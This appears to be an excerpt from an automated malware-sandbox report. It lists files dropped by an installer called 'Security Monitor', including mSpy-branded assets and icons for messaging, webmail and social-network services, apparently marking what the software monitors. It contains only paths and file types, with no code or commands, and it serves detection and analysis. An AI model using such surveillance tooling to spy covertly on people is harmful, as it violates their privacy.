C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-QTR44.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-S0RQT.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-TUD9S.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-U1Q7E.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UG96C.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\none.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\qip.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\skype.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\slack.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\trillian.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\IM.ini (copy)
|
Generic INItialization configuration [Zoom]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-AIC3K.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-OEEOJ.tmp
|
Generic INItialization configuration [Zoom]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\is-L5R5S.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\is-QP01R.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\1.html (copy)
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\business-analyt-sprite.png (copy)
|
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\green_action_btns.png (copy)
|
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-7FI0D.tmp
|
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-Q1V98.tmp
|
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_block.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_cal.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_chat.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_device1.png (copy)
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_gps.png (copy)
|
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_rest.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_web.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-51P5T.tmp
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-6BUHR.tmp
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-9GTUL.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-C4I5G.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-GQ2IH.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-IS7L4.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-M79P5.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-N8TBJ.tmp
|
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\logos.png (copy)
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\is-VSD7S.tmp
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\anythingslider.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\blue-arr-buy.png (copy)
|
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\core-ui-select.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\ic_device1.png (copy)
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-AOB0E.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-DFHOU.tmp
|
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-L5VCB.tmp
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-P22IA.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-QRTS4.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-RT31F.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-SBJET.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-SG2PR.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-SSVU5.tmp
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-T91A6.tmp
|
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-VGS5B.tmp
|
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\logos.png (copy)
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\main.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\mspy_products_home_slide1.png (copy)
|
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\photo1.png (copy)
|
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\print.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\reset.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\widgets.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.png (copy)
|
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-1T2SC.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-3G17H.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-4LKQ0.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-59G9D.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-5MVFR.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7A76O.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7A8F5.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7MDAN.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8NCJ5.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9QOV8.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9R6DJ.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-A9KFE.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-AH09A.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-BED91.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-BGT52.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-BUT4O.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CHI3B.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CI83B.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CMJBG.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-COH3S.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-D2TJO.tmp
|
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GCTVR.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GI2H6.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-H3BUC.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-HFABH.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-I9S3K.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-IHUVN.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-ILMP7.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KA5ML.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KJ09E.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KRID3.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-L42H5.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-L50OI.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-LQULB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MBMIR.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MOBTF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-ONFO1.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-PKKMK.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-Q6G01.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-S1IC5.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-S9EUK.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-TFJD8.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-UH7LN.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-UKBC1.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
